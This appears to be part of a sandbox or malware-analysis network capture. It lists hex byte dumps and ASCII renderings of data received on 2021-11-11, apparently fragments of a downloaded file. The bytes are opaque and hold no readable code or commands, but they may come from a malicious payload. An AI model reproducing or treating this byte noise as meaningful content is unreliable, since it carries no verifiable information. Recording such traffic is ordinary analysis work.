                                                                                                                                                                                2021-11-11 11:26:10 UTC4696INData Raw: d8 00 3f fc cb 37 45 6d 96 0b 0f 05 4d bb 80 86 ef 3d 25 b4 03 c5 08 9a 07 5c b2 a8 33 e9 be 00 46 bf 7d 5a 40 f2 cc b5 3b 58 fd ba 48 75 01 4f 86 30 b0 c1 fa 3b 60 44 8c 3d 54 7e 8e 75 d0 e5 e3 a1 98 1a d8 69 9a f4 00 37 49 44 bf bc 3d e3 2a 01 f9 68 17 cf 35 5e 13 3a f7 f0 c0 29 34 c3 35 f2 00 e8 4a 22 21 26 e9 7d 51 7c 47 0e 72 16 90 83 80 f9 ad 2c cb 7c 00 ff 94 ca 61 d8 a7 4d b7 00 f8 8c 3a 26 13 0d e2 82 00 54 c9 a5 58 14 9f 2d 79 00 ca 9a 6c 01 d5 b0 ab de 00 28 45 66 9c f8 19 a5 7e 00 7a 47 d3 40 cc 2a ee 3a 17 ea 1d 08 ec 7a 00 28 1f 7a cb f7 d9 06 00 a0 9d 05 b4 70 44 e8 d7 24 b9 2f f4 00 17 af c5 61 18 9a 00 5f 14 f6 de e6 f9 92 1b fd fc 46 72 00 fc e4 6d 49 7b 19 1c 0d 00 0b 48 7a 0c 2f 65 db 3e 00 bb f2 54 63 3b dc ce 99 00 41 48 72 f8 a4 2d
                                                                                                                                                                                Data Ascii: ?7EmM=%\3F}Z@;XHuO0;`D=T~ui7ID=*h5^:)45J"!&}Q|Gr,|aM:&TX-yl(Ef~zG@*:z(zpD$/a_FrmI{Hz/e>Tc;AHr-
                                                                                                                                                                                2021-11-11 11:26:10 UTC4712INData Raw: 31 00 9e b2 98 59 f0 5d 24 63 00 6d c3 6a 39 35 b1 42 60 f6 8f 00 84 df 0a 80 36 0c 2f 6d 00 74 95 05 4a 2d b9 61 67 09 9b dc 29 19 80 a4 2f 9d f1 25 00 13 83 7f 3a 59 28 82 81 ee 95 00 73 6f 0f 11 f3 8a c0 24 00 c5 dd 8c c8 4c 64 98 14 00 2e 6c a1 12 33 94 cd 44 3e fa 09 80 e6 92 a5 6b 24 ec 26 00 70 cf a8 3c b9 21 d3 1a 00 fe b8 13 b6 c2 c1 ac c7 04 e9 8f ff c9 6e c0 2b 2e 83 a3 0a d2 3f cd d6 b8 04 7a b4 f0 80 d9 7e 44 94 0f 5a f3 5e ad 54 99 00 83 3a 98 c5 a9 e4 1c 09 93 7b f2 6a 80 31 bf 65 49 d6 00 c9 95 ad bc a1 45 01 e5 7c 0e 00 bb b2 53 47 b5 9d 74 6e 03 4c 98 3e da 0a 0b e8 bf cd d5 00 0c f6 85 86 7c 22 03 5a 60 ec 60 ef 62 19 31 01 99 7f 33 ca 08 54 47 e8 07 f5 13 e0 84 ee 9f b0 1f 8d b6 40 1d 0d f3 c7 aa 6c 00 a9 f6 d6 60 ad d4 cd e7 00 db 69
                                                                                                                                                                                Data Ascii: 1Y]$cmj95B`6/mtJ-ag)/%:Y(so$Ld.l3D>k$&p<!n+.?z~DZ^T:{j1eIE|SGtnL>|"Z``b13TG@l`i
                                                                                                                                                                                2021-11-11 11:26:10 UTC4728INData Raw: 0d 80 0d 86 d8 a2 07 7c 50 ea 89 54 b0 9c 08 a9 a7 00 69 28 70 29 21 48 37 88 0f d5 cc 55 56 80 be 72 b0 e9 52 00 19 ac 3e 1a 64 e3 09 0e 0e b8 af 56 a0 e7 e4 ee 40 30 02 e7 bd 00 0b 4c c7 97 c8 f3 86 ed 00 26 8f da 49 01 25 b5 4e 7e 73 03 37 a6 ca f8 a9 44 a8 f0 13 43 00 67 02 a7 0e 68 1c a2 c0 00 48 36 3c d8 c6 5a 9b 5f 00 d5 6f 08 62 88 a8 13 22 00 23 da 44 18 45 63 9d 70 00 6b cc 8b 91 e3 15 f3 d7 00 dd 66 b8 ad 4f a4 13 2d 00 84 48 07 94 78 21 cb b7 02 d7 fd b0 2b 9e 2f d7 60 a4 a3 7b 00 d6 be 5f 71 e2 d4 51 f6 07 2c c6 40 dc 45 10 ba b8 4d 77 00 15 c1 68 f3 3e 9b 56 26 71 9c 00 83 bd 58 f6 60 8a a1 54 0f 76 5c 1a c3 e0 c5 28 3a 8f 71 0e 2c f2 db 45 e3 d6 55 24 c8 df 5e bd 00 66 f4 37 03 76 28 a8 f7 00 49 31 11 fb c2 f5 3a 21 ea da 00 f8 64 1c eb 77
                                                                                                                                                                                Data Ascii: |PTi(p)!H7UVrR>dV@0L&I%N~s7DCghH6<Z_ob"#DEcpkfO-Hx!+/`{_qQ,@EMwh>V&qX`Tv\(:q,EU$^f7v(I1:!dw
                                                                                                                                                                                2021-11-11 11:26:10 UTC4744INData Raw: 36 00 be 1a 52 80 64 87 48 c1 00 13 54 af f1 ec 7b 91 1b 00 cf ea 57 97 b9 f3 6a bf 7d 6e 00 15 2e 2d 75 c5 5a 67 48 00 e4 70 ce 97 02 b9 27 33 00 99 c8 f4 c9 90 da dd 15 01 4a cf 38 cd 86 cc 83 dc f5 be 02 b3 9f 07 ac 30 fe 80 e0 2f 63 a3 5b 01 99 72 cb 49 12 33 86 fc 70 b9 00 8e 4f b3 f8 9b 07 93 66 00 a3 d7 59 f1 e4 cf 7a 94 00 5a 60 52 88 97 1f cb 19 fa 73 03 96 fd f2 db cf 54 e8 72 b0 08 03 78 27 7e ea d5 60 e8 1c c3 2a 00 37 06 0d 17 af d8 cf e6 00 55 19 23 a0 56 59 0f e3 15 24 c2 79 60 80 fb da b2 20 8b 01 14 ce f1 f2 b3 9a 9f e0 28 dd 00 ca a9 cc 7a 75 07 65 2e 00 4e b1 c4 72 9a ce c2 30 07 e5 57 44 d1 75 80 cd 51 b5 74 00 b3 ac 8e e0 a9 f8 4e 10 03 b6 a1 37 4d 8d e6 90 42 e1 ba 00 52 78 eb c0 80 95 3e f6 90 72 00 79 50 9a b3 53 dd 7e 2c 00 66 62
                                                                                                                                                                                Data Ascii: 6RdHT{Wj}n.-uZgHp'3J80/c[rI3pOfYzZ`RsTrx'~`*7U#VY$y` (zue.Nr0WDuQtN7MBRx>ryPS~,fb
                                                                                                                                                                                2021-11-11 11:26:10 UTC4760INData Raw: 80 ac 10 e1 da a6 82 3c 00 9a ae 85 84 ec 3e bb 52 00 17 5b 9f fb f4 02 cd 11 00 73 4c 8e 6c bd f6 29 07 0f 8d 5e 1b a1 dd 03 ce 7f 96 d2 a5 c0 6c d1 7d 0c 00 2f 90 91 88 79 ba 11 c5 03 c8 63 86 c0 2c d3 a3 cd f2 8a c0 c6 6c 62 00 90 28 b4 a0 b9 b1 e9 37 fa 8e 00 38 f4 40 f8 ca 92 c6 e7 00 51 b8 cc e8 78 37 23 a7 00 10 a4 27 69 d5 6b 5a 19 3c 52 b9 02 9f d8 35 e4 37 40 71 f4 75 00 fe 7a ce 92 89 74 39 2c 00 04 ac 99 d2 f0 8b b9 53 03 d7 15 22 7b eb 8a d2 52 e0 ea 25 45 03 9f 73 1a 95 e0 38 c0 b2 ed 21 07 6a ac e3 7d f2 a0 03 9b c8 7a 3f eb 2f 00 b5 36 51 40 5a 2b c2 03 fe 6f b3 24 c7 f5 d8 13 47 c1 3a 16 32 00 c9 fc cf e8 fb 57 60 00 4a ce b5 c7 f2 c1 ec 6f 1d 1e 19 7a 87 4f ac ee d0 1c 6c e6 de 00 aa 47 3a 80 bb c6 18 ca 2c f7 dc 13 00 df 68 51 23 d4 b0
                                                                                                                                                                                Data Ascii: <>R[sLl)^l}/yc,lb(78@Qx7#'ikZ<R57@quzt9,S"{R%Es8!j}z?/6Q@Z+o$G:2W`JozOlG:,hQ#
                                                                                                                                                                                2021-11-11 11:26:10 UTC4776INData Raw: c8 2a 2f fc 5e f2 00 d3 30 07 97 ca d5 ea c7 3e e8 7b 83 7c bd 77 0a 37 f8 d1 92 86 7a e5 60 c5 c0 3b 83 e9 24 00 0d 43 54 ae af 3e b4 21 0f ce 60 eb 09 40 f4 a4 5d 82 10 00 de 6d bd 2e 4f 6c ea 45 00 e0 ae 38 e4 36 1e 95 c7 00 e3 80 10 63 dc f3 b9 ba 00 2f 27 c2 da 14 6c 6d 83 00 ea f7 d5 30 05 08 80 a3 04 45 94 eb 9f ce c0 ef be 5c a0 39 ee 33 00 92 ff d6 f7 fe 8f 96 00 e9 4e ba 83 16 cc 51 7b 0e 9f e1 98 2a 00 ab 89 9e 37 67 3a ee c0 00 e4 fa db 72 f7 0d 4b 03 60 87 a5 76 f3 b7 a3 7d d3 64 db 2b ac ff f3 f0 af f9 1a 08 af e0 39 1b bf 01 9b b1 be 6c 3e 2c ed d0 5d 66 00 e5 5e c8 60 c0 20 0e 8a 13 47 51 9f ea 73 58 ae d8 0f 4a ec 10 81 b3 54 a4 74 20 35 10 ea 9c 98 b2 73 4c 73 81 07 de 8a ca 55 6c f7 4a 41 b3 06 af 5e 28 46 08 00 7b a9 56 ca da 51 18 53
                                                                                                                                                                                Data Ascii: */^0>{|w7z`;$CT>!`@]m.OlE86c/'lm0E\93NQ{*7g:rK`v}d+9l>,]f^` GQsXJTt 5sLsUlJA^(F{VQS
                                                                                                                                                                                2021-11-11 11:26:10 UTC4792INData Raw: 88 45 53 19 f1 2c da ef 9c ba 29 0e 6b 71 b4 49 bf 2e 2c 67 7c 88 5f e9 20 73 5e 58 28 a5 c1 c3 db 7a e2 3d d9 12 32 85 01 65 58 eb 82 ee 25 71 68 1f 81 c8 fd 96 02 04 81 1f 36 20 9e 30 89 88 4a 04 0f ce 9f 50 09 46 0e 76 a0 7d b1 d4 f5 60 c1 22 6d 04 f9 59 34 0c 7a 95 68 fe cd 99 b9 98 3b 08 85 9b 67 15 0c 12 7f 4a 75 16 b2 88 f6 b6 4a a1 cc be 36 73 0b 95 93 84 4a 31 99 b8 01 1e 4d ca 09 95 10 3e 1e 3a 58 c2 80 75 5b e0 43 b3 03 3f 6e ed 63 d0 4d 89 b8 ec a4 f4 3a 01 37 5d 76 8a d1 34 fc 7f 26 0c f0 74 00 67 1d 0e d9 17 3e 01 f1 52 31 7d 12 a5 db 83 64 ce 43 70 2e 3f 6c 93 06 c5 4a b0 37 84 38 c7 f1 4e 66 32 28 0c 64 ee f5 1e c0 ad 06 66 78 02 f6 33 ac 2c 4e ca 00 51 38 2a 21 42 6a 8c 79 88 63 4c 3e 73 68 30 4d 9c 59 46 b4 21 10 ac 88 f6 04 35 fc 5a 44
                                                                                                                                                                                Data Ascii: ES,)kqI.,g|_ s^X(z=2eX%qh6 0JPFv}`"mY4zh;gJuJ6sJ1M>:Xu[C?ncM:7]v4&tg>R1}dCp.?lJ78Nf2(dfx3,NQ8*!BjycL>sh0MYF!5ZD
                                                                                                                                                                                2021-11-11 11:26:10 UTC4808INData Raw: 7f d3 e1 0a 93 c4 3e 2c 26 7f 65 ba 0c 13 bc 64 4e e1 b3 15 42 ac 72 f8 fc 80 8f 13 85 4b 5d 3e 9a 20 79 be f0 27 e1 54 4a f2 a4 c1 ba 16 ac 24 c2 ff b0 06 43 17 5e b4 e0 b2 94 5a 10 44 88 f4 d4 ff 2c 3a 45 f8 02 4e 7c ed 7a c0 74 1f a2 7a 2d 3f 0b 3d e1 20 b6 c1 f1 40 e9 d7 92 6b 63 5f 2a 38 95 0c 56 ba 32 10 9c 49 06 5d 6a 55 28 80 1a 2d 67 60 de 3e 62 14 1b 03 2f 11 3c 30 c5 94 1e 4b 84 00 9f a5 19 58 7a 9a a3 97 47 45 28 28 09 e3 b2 dc 49 00 40 5f c7 68 6b 24 82 a7 26 0b 16 bf 7b ba 82 49 8a e9 0b 5a d2 82 98 55 ee 88 43 28 7a 4a 81 e9 ba d0 1e b8 60 85 a5 c6 7b 2d cb b6 54 72 64 ac ba 84 16 ff db 72 36 b4 25 34 b0 59 97 79 4e e4 28 36 38 5a f8 e0 2a 4e 14 34 6a 5d df 16 6f df a4 cd c2 49 51 22 02 bd 9c 3b 0f a9 40 0e 10 d5 90 40 30 c0 46 20 b0 56 35
                                                                                                                                                                                Data Ascii: >,&edNBrK]> y'TJ$C^ZD,:EN|ztz-?= @kc_*8V2I]jU(-g`>b/<0KXzGE((I@_hk$&{IZUC(zJ`{-Trdr6%4YyN(68Z*N4j]oIQ";@@0F V5
                                                                                                                                                                                2021-11-11 11:26:10 UTC4824INData Raw: e6 43 55 06 40 05 21 01 63 4b 7f 4e 11 e7 6a 2e bd a6 cc 56 15 43 10 a8 d4 ff 4f 6c 3e 64 b5 89 f2 df cf ca 31 10 52 db 28 28 c1 f5 49 eb ff fa 5f d1 da 60 16 c0 0a bf 00 9b c3 44 f4 87 22 1d 93 76 99 ea 2c b9 f4 50 d9 b5 80 44 11 4b f5 df c8 84 e0 95 02 e6 62 f2 f4 82 f0 1a 0a 03 12 aa b4 df ec 4e ef 00 c6 30 7e d6 07 b9 f8 79 33 02 07 3b e0 14 13 10 3f 2d 86 d7 59 17 8c 68 6f b4 26 06 a9 f6 35 86 84 10 01 4d 54 c0 13 51 27 39 7f 01 64 68 5c 15 fe 3a b2 22 5f f4 ac 7f b0 6c 00 37 bf f8 71 2f 97 44 29 97 de 16 70 ba 88 04 7c 12 ae 29 fa fe ce bf 05 e9 b0 6a cc be 07 76 f7 bd 95 4c 00 e7 f8 5a 51 63 8b fb 2b a6 ef c3 bf 66 44 ad 07 99 ea 10 02 3c 07 d8 ff 25 67 89 fe bf 68 b3 13 44 b8 24 c0 20 71 0b 2f 43 4c 19 22 86 3c 2a 36 f6 bc 0d f4 07 5c 9e 18 40 2c
                                                                                                                                                                                Data Ascii: CU@!cKNj.VCOl>d1R((I_`D"v,PDKbN0~y3;?-Yho&5MTQ'9dh\:"_l7q/D)p|)jvLZQc+fD<%ghD$ q/CL"<*6\@,
                                                                                                                                                                                2021-11-11 11:26:10 UTC4840INData Raw: ed e5 01 1a f9 81 49 3b 41 b0 39 27 30 d5 2d 16 0f 4b bb 20 2c a4 3f 7f b5 81 5a 74 a8 01 10 32 6e 40 9d 45 68 43 46 4b 14 10 fc 76 ea 5f a9 c0 ec 42 40 b8 e7 41 76 1e bc 63 28 03 27 01 b0 8d ba 69 60 67 cd 8b 20 70 d5 50 82 60 65 48 ee b7 e6 99 94 36 85 b4 42 d2 af c0 3e 34 a7 7a 18 35 51 e5 34 58 0e 25 f5 ff 79 da b0 6c 39 15 41 60 7b 90 cc 62 b3 74 30 a2 37 10 a5 83 01 bd 14 f5 f0 f4 30 3e 08 b8 a5 d3 18 18 24 3b 63 10 2c c3 9d f3 18 b0 e8 ee 75 96 60 3f 74 6d c5 cf 0a 32 de 38 d8 1e 9a 1a fa f2 16 d6 d0 1f f0 02 6c 58 f2 f0 82 26 5c 40 20 10 11 e2 5b 80 14 75 84 20 0e 82 00 58 e7 a8 17 40 47 67 84 01 1a 81 eb 8a a1 fd 07 8d 0c f9 0d 32 87 0c e9 6c 32 8f 80 c3 b6 3e fa 0c 83 80 1c 8e 05 b5 6a 75 0d 08 0c 09 14 09 20 17 2c ca 38 0b e9 8e 78 a4 f0 5c 26
                                                                                                                                                                                Data Ascii: I;A9'0-K ,?Zt2n@EhCFKv_B@Avc('i`g pP`eH6B>4z5Q4X%yl9A`{bt070>$;c,u`?tm28lX&\@ [u X@Gg2l2>ju ,8x\&
                                                                                                                                                                                2021-11-11 11:26:10 UTC4856INData Raw: 63 d3 5a 2e b1 9c 55 c6 d1 e8 ee 50 c2 e9 8a 58 3b 2a 0c 5d 20 2f b1 18 51 ef 6b 9a 06 d2 34 80 8c 0b e5 30 59 71 0c bf 0d e7 09 66 de c6 a3 dd b4 25 0c d3 4d 22 68 5c 0f 06 eb 0c 43 58 2b 58 25 41 c5 74 85 ea b0 05 f5 2a 96 f0 56 d6 05 31 c4 73 e8 32 05 92 37 18 aa dd fb bb a0 0c 90 fb 7f bc 83 06 78 29 3e 65 f4 10 7b 8d 9d d4 6b c0 53 9b 07 50 03 d6 22 aa 8b 1d 54 e4 ba 10 4a d6 13 56 e1 c4 4d ad 7a 81 98 6b e3 69 88 58 7e 13 02 d1 77 f5 b5 52 3c 17 e5 8f c0 aa 29 f5 65 0e 50 c4 24 af d2 63 28 24 a4 79 dc 44 5d d7 ee 46 3c 62 29 18 4f 6a ba 94 f9 06 aa 85 a4 9c 0b 58 d6 9f e2 90 de be 79 18 56 2b d1 34 ff 38 f0 73 64 32 10 c3 bb c5 5c ab dc b9 11 10 b0 1c 67 03 ac c1 34 42 fa bc 92 7e 6b 55 b8 94 25 4f c4 14 ee 05 b3 02 64 c8 63 bb 01 36 20 53 82 15 97
                                                                                                                                                                                Data Ascii: cZ.UPX;*] /Qk40Yqf%M"h\CX+X%At*V1s27x)>e{kSP"TJVMzkiX~wR<)eP$c($yD]F<b)OjXyV+48sd2\g4B~kU%Odc6 S
                                                                                                                                                                                2021-11-11 11:26:10 UTC4872INData Raw: 16 6b 73 fc 07 b1 50 89 b0 2e 0c 78 e2 24 12 7f df 33 04 a0 39 73 f7 9c 40 d8 99 9f 80 5c 1a 62 d5 ec 80 4b 89 7d 03 7d f6 a8 e9 24 c7 9d 50 e2 32 c2 57 e4 69 62 c8 4b b6 00 4c 41 10 cd ff 3c 5e a5 48 e1 38 86 ee 18 60 0b 37 eb 52 ed 7d cc f0 08 c4 8c 7d d0 0c b3 2a 08 42 16 a2 d8 7b 28 a4 25 9d 74 1e 82 e7 a6 d5 6d 00 8d a7 d4 ff 80 b2 a3 a0 9a 5d 01 bd 79 85 67 21 c2 2a d9 d5 53 12 00 fe 1e 05 b1 d7 cd be 72 80 61 26 e5 7e 22 c5 c5 68 f1 12 00 ea 0d 54 e4 39 47 14 5c b6 4b b0 3a d4 01 0e 6e 3f df ba 17 82 44 be d1 ee 1d d5 e4 57 4b d5 c4 2e fa da 28 3a 1c dd 54 17 52 fe ae 2a d5 76 e0 48 8d 19 f9 10 53 af 4c 5c df f0 ca 08 00 28 6b d2 b4 2d 92 cc ff 4e fc c0 3e 6a 7a fb 01 e8 bf df b0 f8 c5 da 2b 97 fa 84 47 eb 85 db bf 81 97 79 69 00 af f7 b7 5a 14 49
                                                                                                                                                                                Data Ascii: ksP.x$39s@\bK}}$P2WibKLA<^H8`7R}}*B{(%tm]yg!*Sra&~"hT9G\K:n?DWK.(:TR*vHSL\(k-N>jz+GyiZI
                                                                                                                                                                                2021-11-11 11:26:10 UTC4888INData Raw: ff bf 64 5b c3 76 f8 a9 dd 18 60 86 4d 0b 98 e3 55 36 74 c0 04 67 7d f8 fe f6 24 7c 18 81 a9 cc 25 e3 d2 0c ad 13 4a d6 10 fc 2d 6f fe 33 b6 06 80 29 e1 57 13 0c 03 b7 58 2b 0e 23 39 0b ac c0 ef fd 77 30 88 a4 a6 01 1e b9 94 a7 a3 c9 b0 d4 11 6b 00 36 67 91 24 a5 92 48 2d 03 f7 a1 d7 6d 8e 61 26 e0 f4 fc 00 14 b8 e2 fe 2e 8b 0c 92 e1 69 8c 21 df 06 e8 57 27 42 d1 a8 2d 87 31 7f 10 c2 3a db c0 8c 86 f1 65 6a bc 7f 5e 02 88 7e 4a 75 8b 66 7f 51 2f 03 3b 31 f2 19 a2 65 7f 49 cf 60 fb 09 5a 94 e0 3a 44 03 17 9a 8f d8 a0 a0 b0 50 f6 85 b5 31 b3 44 98 c5 cb 22 06 02 63 66 a0 d2 74 76 26 bf a4 41 92 0c 5a 8d 5c 6a 01 e4 08 f2 27 ec ea 69 ec 38 4f 97 f9 04 c7 de c1 85 f0 ff 3b ec d0 c0 09 84 ac ed fe 10 8b 1f 43 00 ad 70 2f 9d 7b 9c 4d b7 81 f2 1e a2 06 c0 7e a8
                                                                                                                                                                                Data Ascii: d[v`MU6tg}$|%J-o3)WX+#9w0k6g$H-ma&.i!W'B-1:ej^~JufQ/;1eI`Z:DP1D"cftv&AZ\j'i8O;Cp/{M~
                                                                                                                                                                                2021-11-11 11:26:10 UTC4904INData Raw: f9 50 00 77 bb 15 8d 39 eb 1f 05 43 42 0f b6 0c aa 32 9f b8 f1 fb 0c 4f 50 e4 20 70 5f 9d f4 5a ef 13 ed 2b 84 67 f8 fc c4 58 fd b7 c9 57 d3 f2 6e db 65 d4 e2 cd 14 56 c4 8e 5d 39 f3 c6 dd a9 36 f7 88 66 5e 58 b5 f6 89 5b 40 34 c2 e2 60 b7 14 36 ad c5 53 c0 24 45 80 92 71 c8 62 09 28 8d 62 5f c5 58 82 1e 0a ce 16 40 94 6c 8a 17 e7 31 f4 ff 02 b4 de c5 ff ac 1a 24 83 7d f9 37 e9 6e 4e ff 0b c0 03 9a 60 1a 07 12 97 c5 54 79 92 0e 42 75 86 31 74 7d f4 95 5a e6 c1 96 5d 9e 7e 31 44 74 c6 f2 a4 08 77 5f c4 86 fa 17 be 8c dc a0 07 15 9c 68 5f dd 99 df 59 fe a5 8b e8 75 ee 26 d6 18 ab 22 aa 5b 5d 11 36 54 6f b0 1a f4 14 90 fe 7f 19 98 4a ae 2b 37 1a 80 7d 31 4d 89 dc a6 44 63 07 ec c5 a7 f7 5f 73 01 d4 21 14 c4 17 5a bb 98 dd 61 16 97 d9 6a ba 76 80 08 02 c6 68
                                                                                                                                                                                Data Ascii: Pw9CB2OP p_Z+gXWneV]96f^X[@4`6S$Eqb(b_X@l1$}7nN`TyBu1t}Z]~1Dtw_h_Yu&"[]6ToJ+7}1MDc_s!Zajvh
                                                                                                                                                                                2021-11-11 11:26:10 UTC4920INData Raw: 20 d4 8c 94 04 68 41 e8 bb 3e ee a8 2b 8e c2 fd d1 54 b4 eb e8 2b b9 2b cf 6c 4d 4a 59 54 b4 ab fc c8 f9 27 fa d6 fe cb 85 08 4c 89 2c 49 72 b3 fb 02 e5 30 f6 1f 88 ed 5f 4c f4 4c 4f 0d f6 db ac 92 0c bb ab 99 54 89 c2 df 5b 16 7f b5 5c cb c4 50 ae 39 2b 7a 01 f2 d4 d1 fa 6a 0c 29 86 b5 9c 4d 51 05 1b 00 62 99 2e 0e e1 2b ea 2e 13 4a ab 70 67 29 4f ff 5f 39 9d 4b 3f 8b 38 92 aa e2 23 b4 ba 6b e7 4a bf ce 58 d2 e8 f9 b8 65 10 51 67 39 b9 54 c5 ff 29 14 2b aa 2a cc 12 5a 8f ab b3 4b f5 ed e2 4e 90 f9 3b 9a f6 42 5f 6a 6e 11 81 ba f0 ef 7f 4c 3a 59 44 1c 44 19 2e 0b b6 5d f0 a9 82 26 96 7e 20 6f 5e 9d 5e b9 52 77 56 ae 76 95 44 7f 2d e9 73 d4 5f 1d 81 89 5f f8 dc e5 83 89 3f fb 0d 12 0c 09 73 af 37 61 8f 11 76 ab 14 e5 02 20 e9 28 dc fd 66 4c 10 a9 61 fd c3
                                                                                                                                                                                Data Ascii: hA>+T++lMJYT'L,Ir0_LLOT[\P9+zj)MQb.+.Jpg)O_9K?8#kJXeQg9T)+*ZKN;B_jnL:YDD.]&~ o^^RwVvD-s__?s7av (fLa
                                                                                                                                                                                2021-11-11 11:26:10 UTC4932INData Raw: 71 bf 80 7c 1f fc 7c 06 e0 90 24 89 50 6a 03 32 52 48 d3 3d bc be 61 48 fc 8a a9 30 20 59 e0 ce 12 32 15 a3 f7 84 84 c9 e2 07 7d 14 09 7f f3 e9 e8 26 d3 a2 b8 02 2d eb 55 3e f2 a0 68 63 47 2e b0 52 3c 87 bd a3 35 74 34 02 82 6b 02 7b 3a 37 28 a7 84 f6 06 10 07 82 17 dd 58 75 fc 1c 74 a6 1a 9e 3c 83 2b 1f 1a 10 01 34 bc 4a 06 2c fc 37 8b 84 5c f9 57 3b 2f 58 b4 33 18 3e 68 b0 32 33 0c 66 4b a5 34 e0 79 4f 9b e3 a0 27 20 f9 a0 0b 8f 54 44 e8 e2 f0 20 2a 0d 80 11 b9 70 e1 10 a4 41 db 20 59 62 0c 7c 3b 72 06 58 f3 60 de 64 53 b8 db 02 3f 12 af 8c 70 d6 d9 20 97 40 26 b6 01 c5 6f 20 24 bc f9 3b 84 d4 5a c0 5b b0 d2 7e 3b f0 3f 96 2a 33 ee da b5 0f d9 7e dc 78 e0 11 73 0a 0a 12 6b f2 e2 0b be 46 7e 82 ea 06 54 f8 e6 80 c8 9e 95 cf e8 e2 d9 e4 02 5f 57 15 0c 05
                                                                                                                                                                                Data Ascii: q||$Pj2RH=aH0 Y2}&-U>hcG.R<5t4k{:7(Xut<+4J,7\W;/X3>h23fK4yO' TD *pA Yb|;rX`dS?p @&o $;Z[~;?*3~xskF~T_W
                                                                                                                                                                                2021-11-11 11:26:10 UTC4936INData Raw: 6e fd 09 45 d5 b0 19 7c 46 e2 c5 c2 75 e5 ec b2 7e d2 e3 9c 22 31 28 12 53 16 7c a1 a1 6b 35 44 af c9 ff 2a 01 47 39 16 df 1d 09 3b b3 c2 4c d9 8a f4 13 27 4a d8 fd fb a8 27 d5 33 54 c3 53 58 04 02 81 9c 91 75 7f 3b f7 b6 65 5e eb 13 0f 20 fd 85 c8 42 90 84 0e b9 26 ce 7b a1 c9 1a 63 7f e8 2a 36 25 d7 3f e7 fc 04 4c 28 bd f8 52 0f 55 d7 7d 41 c1 40 ef 7f 3a ec bc ae 5a bd 9d f4 c9 39 6f b2 d2 04 bc 7d cf 5f ae a5 90 04 09 ab f4 a4 2c 07 24 45 b0 1b 7f cc 12 c7 a2 08 5e 60 9a 20 45 75 db 29 c9 ab b9 5e a0 56 95 bd 77 21 f1 b3 ba 33 2d d0 5e fe 43 95 c3 09 4b b8 d6 04 17 58 d7 6e 77 81 c8 eb 3f 02 c5 20 f8 2a d7 2f de 0e 83 da 21 b3 1b 04 1d 20 40 dc 7b fb e6 9f 00 95 8e f0 ff 9d 3e 32 4a 50 4f e0 b0 69 0b 7f 04 c2 04 be 87 a4 30 b2 65 36 8a 6e 0f 24 a2 12
                                                                                                                                                                                Data Ascii: nE|Fu~"1(S|k5D*G9;L'J'3TSXu;e^ B&{c*6%?L(RU}A@:Z9o}_,$E^` Eu)^Vw!3-^CKXnw? */! @{>2JPOi0e6n$
                                                                                                                                                                                2021-11-11 11:26:10 UTC4952INData Raw: 1c cc 40 2e dc 19 f0 2e 25 13 04 03 78 2c cc 17 00 28 72 97 8d f6 a5 14 c3 2f c1 eb 5e 04 e0 ba 16 0b 1f 4a 01 ed f0 80 9d 3c 2e 75 1c 00 3d a2 12 c4 b6 bf 08 18 c2 29 38 94 65 40 7e 3d 03 33 22 bb 1a d9 e0 ce bc 29 c1 50 49 be ba f9 83 6c 5c 06 6c 23 4c e0 81 0f 40 43 da b7 be 3d ba 8b f8 ef 7d 43 e4 b0 76 44 91 3e 6a 02 d0 be 0b 4f 82 ad 36 c1 b4 14 8d 86 34 27 18 95 48 28 6f 42 90 1e 5a a1 47 43 a8 61 08 40 0a 93 c6 75 ba e1 19 88 a6 1f 1a 97 d1 8b 7d d9 02 3f f3 a5 8c ab 68 32 40 96 c0 08 c7 82 e7 26 cb 30 98 54 f8 5b 63 04 01 af 78 2f 9f bc 45 d5 3b e2 ce cf b4 82 0d 36 02 d5 30 d6 5c af 04 6c 98 17 dc fa ef a8 b9 b2 91 e0 5c 39 fd b5 7e f3 60 9c 68 ec 72 4e 6e bc b8 2d 1c 7f 34 bf 97 72 43 94 b2 5a df 79 a2 27 5f e5 2c 4b f7 47 7b 25 f1 80 26 38 41
                                                                                                                                                                                Data Ascii: @..%x,(r/^J<.u=)8e@~=3")PIl\l#L@C=}CvD>jO64'H(oBZGCa@u}?h2@&0T[cx/E;60\l\9~`hrNn-4rCZy'_,KG{%&8A
                                                                                                                                                                                2021-11-11 11:26:10 UTC4964INData Raw: fb 1d ac 68 48 0c 76 11 78 2e 0e 94 a6 46 d5 2b 40 f1 d6 ca 14 02 2d aa 46 54 81 82 ea bc 90 60 ff 53 c7 78 af 56 bb b8 48 4b 17 9f 65 46 82 6f d5 53 60 72 68 d2 18 8e 6c c2 e2 97 ff 3a 54 f4 6d 10 7a 33 65 ea 4a 31 fa 38 b5 b5 01 45 1d 6e 7e 07 f5 e5 00 3c cc b8 60 4b 2c 29 c5 04 56 25 e9 3b 5d 47 86 20 92 09 23 24 7b 27 00 58 3d 58 c2 74 2f 2c 08 e0 42 a4 fc b5 32 7f ca 20 ff 04 34 38 ba 62 ea 2f 77 8f 94 23 85 98 e0 01 2c a1 b4 0b 62 b1 d4 40 9e a6 5d f6 b4 aa 0c 49 a8 68 cd 06 c4 d9 7d 03 32 a4 12 c8 46 04 82 96 f2 70 8e 5d 3b 56 0b aa b7 99 50 39 31 4f c1 64 cd 70 86 5c fe b8 d2 91 30 39 da 1c bc 20 92 7b f8 9d 90 bf 0c 9e 03 a4 6e b4 08 f9 1e 07 45 fc fe ff af c0 80 6d 45 9d 27 97 1d 23 b0 0f 37 05 08 20 06 b3 71 ba 40 4e eb 27 fc 17 dd 2a c1 01 e8
                                                                                                                                                                                Data Ascii: hHvx.F+@-FT`SxVHKeFoS`rhl:Tmz3eJ18En~<`K,)V%;]G #${'X=Xt/,B2 48b/w#,b@]Ih}2Fp];VP91Odp\09 {nEmE'#7 q@N'*
